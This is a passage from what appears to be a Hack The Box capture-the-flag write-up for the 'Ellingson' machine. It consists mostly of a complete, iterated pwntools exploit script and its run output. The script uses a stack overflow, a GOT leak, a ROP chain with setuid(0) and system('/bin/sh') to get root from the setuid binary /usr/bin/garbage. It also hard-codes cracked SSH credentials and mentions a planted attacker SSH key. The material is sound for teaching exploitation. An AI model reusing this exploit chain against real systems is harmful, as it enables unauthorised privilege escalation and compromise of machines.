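p = r.process('/usr/bin/garbage')

elf = ELF("./garbage")      # copy of the setuid binary (scp'd from the target)
libc = ELF("./libc.so.6")   # the TARGET's libc - all offsets come from it
rop = ROP(elf)

# Use a distinct name so the leak() function is not shadowed by its result.
leaked_lsm = leak(p, elf, libc, rop)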

save it

root@kali:~/Downloads# gedit exploit.py

root@kali:~/Downloads# chmod +x exploit.py

root@kali:~/Downloads# ./exploit.py
[*] Checking for new versions of pwntools
To disable this functionality, set the contents of /root/.pwntools-cache/update to ‘never’.
[*] You have the latest version of Pwntools (3.12.2)
[+] Connecting to ellingson.htb on port 22: Done
[*] margo@ellingson.htb:
Distro Ubuntu 18.04
OS: linux
Arch: amd64
Version: 4.15.0
ASLR: Enabled
[+] Starting remote process ‘/usr/bin/garbage’ on ellingson.htb: pid 32343
[*] ‘/root/Downloads/garbage’
Arch: amd64-64-little
RELRO: Partial RELRO
Stack: No canary found
NX: NX enabled
PIE: No PIE (0x400000)
[*] ‘/root/Downloads/libc.so.6’
Arch: amd64-64-little
RELRO: Partial RELRO
Stack: Canary found
NX: NX enabled
PIE: PIE enabled
[*] Loading gadgets for ‘/root/Downloads/garbage’
[*] puts@plt: 0x401050
[*] __libc_start_main: 0x403ff0
[*] pop rdi gadget: 0x40179b
[+] Leaked __libc_start_main: 0xb0

0xb0 is a truncated leak, not a bug in the chain: recvline() stops at the first 0x0a byte, and on this run one byte of the address happened to be 0x0a (the real address ends in ...ab0, so the byte before it is 0x?a). Re-running gets a fresh ASLR layout; a robust script reads a fixed 6 bytes with recvn(6) instead of recvline().

root@kali:~/Downloads# ./exploit.py
[+] Connecting to ellingson.htb on port 22: Done
[*] margo@ellingson.htb:
Distro Ubuntu 18.04
OS: linux
Arch: amd64
Version: 4.15.0
ASLR: Enabled
[+] Starting remote process ‘/usr/bin/garbage’ on ellingson.htb: pid 32434
[*] ‘/root/Downloads/garbage’
Arch: amd64-64-little
RELRO: Partial RELRO
Stack: No canary found
NX: NX enabled
PIE: No PIE (0x400000)
[*] ‘/root/Downloads/libc.so.6’
Arch: amd64-64-little
RELRO: Partial RELRO
Stack: Canary found
NX: NX enabled
PIE: PIE enabled
[*] Loaded cached gadgets for ‘./garbage’
[*] puts@plt: 0x401050
[*] __libc_start_main: 0x403ff0
[*] pop rdi gadget: 0x40179b
[+] Leaked __libc_start_main: 0x7f6bdd438ab0

Second run succeeds: 0x7f6bdd438ab0 is a plausible libc address (0x7f..., six significant bytes). Next, extend the script to compute the libc base from this leak and return into system("/bin/sh"):

root@kali:~# gedit exploit.py

#!/usr/bin/python
from pwn import *

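def leak(p, elf, libc, rop):
    """Stage 1: leak the runtime address of __libc_start_main via the GOT.

    auth() reads the password into a stack buffer it can overrun; 136 bytes
    of padding (found with gef ``pattern offset``) reach the saved return
    address.  The binary is not PIE, so PLT/GOT and gadget addresses are
    fixed and the chain is simply:

        pop rdi; ret -> &GOT[__libc_start_main] -> puts@plt -> main

    puts() prints the resolved libc pointer, then main() re-runs and prompts
    again, so the same process can take the next payload.

    Args:
        p:    pwntools tube attached to /usr/bin/garbage.
        elf:  ELF('./garbage').
        libc: unused here; kept so every stage shares one signature.
        rop:  ROP(elf), used to locate the gadget.

    Returns:
        int: leaked address of __libc_start_main in the target's libc.
    """
    POP_RDI = rop.find_gadget(['pop rdi', 'ret'])[0]
    # Ask for the GOT slot explicitly: elf.got is the stable API for it
    # (older pwntools also happened to expose it through elf.symbols).
    LIBC_START_MAIN = elf.got['__libc_start_main']
    PUTS = elf.plt['puts']
    MAIN = elf.symbols['main']

    log.info("puts@plt: " + hex(PUTS))
    log.info("__libc_start_main: " + hex(LIBC_START_MAIN))
    log.info("pop rdi gadget: " + hex(POP_RDI))

    payload = b"A" * 136
    payload += p64(POP_RDI)
    payload += p64(LIBC_START_MAIN)
    payload += p64(PUTS)
    payload += p64(MAIN)

    p.recvuntil(b'password:')
    p.sendline(payload)
    p.recvline()  # empty line printed before the verdict
    p.recvline()  # "access denied."

    # The pointer has 6 significant bytes (0x00007fXX_XXXXXXXX).  Read a
    # fixed count rather than recvline(): if any of those bytes is 0x0a,
    # recvline() stops early and the value comes back truncated (the first
    # run of this script printed 0xb0 for exactly that reason).
    raw = p.recvn(6)
    p.recvline()  # newline appended by puts()
    leaked = u64(raw.ljust(8, b"\x00"))

    # Sanity check: on this target libc lives at 0x7f.... .  Anything else
    # means the output was not a clean pointer (e.g. a NUL byte made puts()
    # stop early); abort instead of returning into garbage later.
    if leaked >> 40 != 0x7f:
        log.error("Bad leak %#x - rerun the exploit" % leaked)

    log.success("Leaked __libc_start_main: " + hex(leaked))
    return leaked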

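def shell(p, elf, libc, rop):
    """Stage 2: ret2libc - call system("/bin/sh") with the rebased libc.

    Chain: ret -> pop rdi; ret -> &"/bin/sh" -> system.  The leading ``ret``
    re-aligns rsp to 16 bytes before system() is entered; glibc's system()
    typically contains SSE stores that fault on a misaligned stack.  No
    exit() follows, so the process just crashes once the shell is closed.

    Args:
        p:    tube to the same garbage process stage 1 used (main() was
              re-entered, so it is prompting for a password again).
        elf:  ELF('./garbage'); unused here, kept for a uniform signature.
        libc: ELF('./libc.so.6') with ``libc.address`` already set.
        rop:  ROP(elf), used to locate the gadgets.

    Side effects:
        Hands the terminal to the user via p.interactive(); does not return
        until the session ends.
    """
    if not libc.address:
        # Without the base, libc.sym/libc.search yield file offsets and the
        # chain would jump into unmapped memory.
        log.error("libc.address is not set - run leak() first")

    RET = rop.find_gadget(['ret'])[0]
    POP_RDI = rop.find_gadget(['pop rdi', 'ret'])[0]
    BIN_SH = next(libc.search(b"/bin/sh"))
    SYSTEM = libc.sym["system"]

    log.success("/bin/sh: " + hex(BIN_SH))
    log.success("system: " + hex(SYSTEM))

    payload = b"A" * 136       # same 136-byte overflow as stage 1
    payload += p64(RET)        # stack alignment, see docstring
    payload += p64(POP_RDI)
    payload += p64(BIN_SH)
    payload += p64(SYSTEM)

    p.recvuntil(b'password:')
    p.sendline(payload)
    p.interactive()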

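# Stage 0: a process on the target, over SSH as margo (password recovered
# from /var/backups/shadow.bak with john).  Hard-coding credentials is
# acceptable for a lab write-up only; outside a CTF read them from the
# environment or a secrets store.
r = ssh(host='ellingson.htb', user='margo', password='iamgod$08')
p = r.process('/usr/bin/garbage')

elf = ELF("./garbage")      # copy of the setuid binary (scp'd from the target)
libc = ELF("./libc.so.6")   # the TARGET's libc - all offsets come from it
rop = ROP(elf)

# Stage 1: leak __libc_start_main and rebase libc.  Use a distinct name so
# the leak() function is not shadowed by its own return value.
leaked_lsm = leak(p, elf, libc, rop)
libc.address = leaked_lsm - libc.sym["__libc_start_main"]
if libc.address & 0xfff:
    # The base must be page aligned; anything else means the leak and the
    # local libc.so.6 disagree (wrong libc copy or a garbled leak).
    log.error("libc base %#x is not page aligned" % libc.address)

log.info("Calculated libc address: " + hex(libc.address))

# Stage 2: system("/bin/sh").
shell(p, elf, libc, rop)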

save it

root@kali:~/Downloads# ./exploit.py
[+] Connecting to ellingson.htb on port 22: Done
[*] margo@ellingson.htb:
Distro Ubuntu 18.04
OS: linux
Arch: amd64
Version: 4.15.0
ASLR: Enabled
[+] Starting remote process ‘/usr/bin/garbage’ on ellingson.htb: pid 32524
[*] ‘/root/Downloads/garbage’
Arch: amd64-64-little
RELRO: Partial RELRO
Stack: No canary found
NX: NX enabled
PIE: No PIE (0x400000)
[*] ‘/root/Downloads/libc.so.6’
Arch: amd64-64-little
RELRO: Partial RELRO
Stack: Canary found
NX: NX enabled
PIE: PIE enabled
[*] Loaded cached gadgets for ‘./garbage’
[*] puts@plt: 0x401050
[*] __libc_start_main: 0x403ff0
[*] pop rdi gadget: 0x40179b
[+] Leaked __libc_start_main: 0x7f95136bdab0
[*] Calculated libc address: 0x7f951369c000
[+] /bin/sh: 0x7f951384fe9a
[+] system: 0x7f95136eb440
[*] Switching to interactive mode

access denied.

$ $ whoami
margo

$ $ id
uid=1002(margo) gid=1002(margo) groups=1002(margo)

The shell runs as margo, not root, even though garbage is setuid-root. Add a stage that calls setuid(0) inside the process before spawning the shell:

root@kali:~# gedit exploit.py

#!/usr/bin/python
from pwn import *

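def leak(p, elf, libc, rop):
    """Stage 1: leak the runtime address of __libc_start_main via the GOT.

    auth() reads the password into a stack buffer it can overrun; 136 bytes
    of padding (found with gef ``pattern offset``) reach the saved return
    address.  The binary is not PIE, so PLT/GOT and gadget addresses are
    fixed and the chain is simply:

        pop rdi; ret -> &GOT[__libc_start_main] -> puts@plt -> main

    puts() prints the resolved libc pointer, then main() re-runs and prompts
    again, so the same process can take the next payload.

    Args:
        p:    pwntools tube attached to /usr/bin/garbage.
        elf:  ELF('./garbage').
        libc: unused here; kept so every stage shares one signature.
        rop:  ROP(elf), used to locate the gadget.

    Returns:
        int: leaked address of __libc_start_main in the target's libc.
    """
    POP_RDI = rop.find_gadget(['pop rdi', 'ret'])[0]
    # Ask for the GOT slot explicitly: elf.got is the stable API for it
    # (older pwntools also happened to expose it through elf.symbols).
    LIBC_START_MAIN = elf.got['__libc_start_main']
    PUTS = elf.plt['puts']
    MAIN = elf.symbols['main']

    log.info("puts@plt: " + hex(PUTS))
    log.info("__libc_start_main: " + hex(LIBC_START_MAIN))
    log.info("pop rdi gadget: " + hex(POP_RDI))

    payload = b"A" * 136
    payload += p64(POP_RDI)
    payload += p64(LIBC_START_MAIN)
    payload += p64(PUTS)
    payload += p64(MAIN)

    p.recvuntil(b'password:')
    p.sendline(payload)
    p.recvline()  # empty line printed before the verdict
    p.recvline()  # "access denied."

    # The pointer has 6 significant bytes (0x00007fXX_XXXXXXXX).  Read a
    # fixed count rather than recvline(): if any of those bytes is 0x0a,
    # recvline() stops early and the value comes back truncated (the first
    # run of this script printed 0xb0 for exactly that reason).
    raw = p.recvn(6)
    p.recvline()  # newline appended by puts()
    leaked = u64(raw.ljust(8, b"\x00"))

    # Sanity check: on this target libc lives at 0x7f.... .  Anything else
    # means the output was not a clean pointer (e.g. a NUL byte made puts()
    # stop early); abort instead of returning into garbage later.
    if leaked >> 40 != 0x7f:
        log.error("Bad leak %#x - rerun the exploit" % leaked)

    log.success("Leaked __libc_start_main: " + hex(leaked))
    return leaked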

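def suid(p, elf, libc, rop):
    """Stage 1b: call setuid(0) inside the target, then return to main().

    Stage 2 on its own produced a shell as margo (id showed uid=1002) even
    though garbage is setuid-root.  Calling setuid(0) while the process still
    holds root privilege also sets the real uid to 0, so the shell spawned by
    system() afterwards stays root.  The gid is left as margo's (the final
    id output still shows gid=1002); a setgid(0) call could be chained the
    same way if a root group is needed.

    Chain: pop rdi; ret -> 0 -> setuid -> main

    Args:
        p:    tube to the garbage process, currently at the password prompt.
        elf:  ELF('./garbage'), for the address of main().
        libc: ELF('./libc.so.6') with ``libc.address`` already set.
        rop:  ROP(elf), used to locate the gadget.

    Returns:
        None.  The program output ("access denied." and the new prompt) is
        left in the tube for the next stage's recvuntil().
    """
    if not libc.address:
        log.error("libc.address is not set - run leak() first")

    POP_RDI = rop.find_gadget(['pop rdi', 'ret'])[0]
    SETUID = libc.sym['setuid']
    MAIN = elf.symbols['main']

    log.info("setuid: " + hex(SETUID))

    payload = b"A" * 136
    payload += p64(POP_RDI)
    payload += p64(0)          # uid 0
    payload += p64(SETUID)
    payload += p64(MAIN)       # back to the prompt for the final stage

    p.recvuntil(b'password:')
    p.sendline(payload)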

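def shell(p, elf, libc, rop):
    """Stage 2: ret2libc - call system("/bin/sh") with the rebased libc.

    Chain: ret -> pop rdi; ret -> &"/bin/sh" -> system.  The leading ``ret``
    re-aligns rsp to 16 bytes before system() is entered; glibc's system()
    typically contains SSE stores that fault on a misaligned stack.  No
    exit() follows, so the process just crashes once the shell is closed.

    Args:
        p:    tube to the same garbage process the earlier stages used
              (main() was re-entered, so it is prompting for a password again).
        elf:  ELF('./garbage'); unused here, kept for a uniform signature.
        libc: ELF('./libc.so.6') with ``libc.address`` already set.
        rop:  ROP(elf), used to locate the gadgets.

    Side effects:
        Hands the terminal to the user via p.interactive(); does not return
        until the session ends.
    """
    if not libc.address:
        # Without the base, libc.sym/libc.search yield file offsets and the
        # chain would jump into unmapped memory.
        log.error("libc.address is not set - run leak() first")

    RET = rop.find_gadget(['ret'])[0]
    POP_RDI = rop.find_gadget(['pop rdi', 'ret'])[0]
    BIN_SH = next(libc.search(b"/bin/sh"))
    SYSTEM = libc.sym["system"]

    log.success("/bin/sh: " + hex(BIN_SH))
    log.success("system: " + hex(SYSTEM))

    payload = b"A" * 136       # same 136-byte overflow as the earlier stages
    payload += p64(RET)        # stack alignment, see docstring
    payload += p64(POP_RDI)
    payload += p64(BIN_SH)
    payload += p64(SYSTEM)

    p.recvuntil(b'password:')
    p.sendline(payload)
    p.interactive()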

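# Stage 0: a process on the target, over SSH as margo (password recovered
# from /var/backups/shadow.bak with john).  Hard-coding credentials is
# acceptable for a lab write-up only; outside a CTF read them from the
# environment or a secrets store.
r = ssh(host='ellingson.htb', user='margo', password='iamgod$08')
p = r.process('/usr/bin/garbage')

elf = ELF("./garbage")      # copy of the setuid binary (scp'd from the target)
libc = ELF("./libc.so.6")   # the TARGET's libc - all offsets come from it
rop = ROP(elf)

# Stage 1: leak __libc_start_main and rebase libc.  Use a distinct name so
# the leak() function is not shadowed by its own return value.
leaked_lsm = leak(p, elf, libc, rop)
libc.address = leaked_lsm - libc.sym["__libc_start_main"]
if libc.address & 0xfff:
    # The base must be page aligned; anything else means the leak and the
    # local libc.so.6 disagree (wrong libc copy or a garbled leak).
    log.error("libc base %#x is not page aligned" % libc.address)

log.info("Calculated libc address: " + hex(libc.address))
log.info("Setting uid to 0")

# Stage 1b: setuid(0) so the shell does not drop back to margo.
suid(p, elf, libc, rop)
# Stage 2: system("/bin/sh") as root.
shell(p, elf, libc, rop)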

save it

root@kali:~/Downloads# ./exploit.py
[+] Connecting to ellingson.htb on port 22: Done
[*] margo@ellingson.htb:
Distro Ubuntu 18.04
OS: linux
Arch: amd64
Version: 4.15.0
ASLR: Enabled
[+] Starting remote process ‘/usr/bin/garbage’ on ellingson.htb: pid 32621
[*] ‘/root/Downloads/garbage’
Arch: amd64-64-little
RELRO: Partial RELRO
Stack: No canary found
NX: NX enabled
PIE: No PIE (0x400000)
[*] ‘/root/Downloads/libc.so.6’
Arch: amd64-64-little
RELRO: Partial RELRO
Stack: Canary found
NX: NX enabled
PIE: PIE enabled
[*] Loaded cached gadgets for ‘./garbage’
[*] puts@plt: 0x401050
[*] __libc_start_main: 0x403ff0
[*] pop rdi gadget: 0x40179b
[+] Leaked __libc_start_main: 0x7fca3dab9ab0
[*] Calculated libc address: 0x7fca3da98000
[*] Setting uid to 0
[+] /bin/sh: 0x7fca3dc4be9a
[+] system: 0x7fca3dae7440
[*] Switching to interactive mode

access denied.
# $ id
uid=0(root) gid=1002(margo) groups=1002(margo)

# $ cat /root/root.txt
1cc73a44802XXXXXXXXXXXXXXXXXXXXXXXXXX

Cleanup: the foothold left an attacker public key in /home/hal/.ssh/authorized_keys (and copies of garbage and libc on the attacking box); remove them when the exercise is over.

@SAKSHAM DIXIT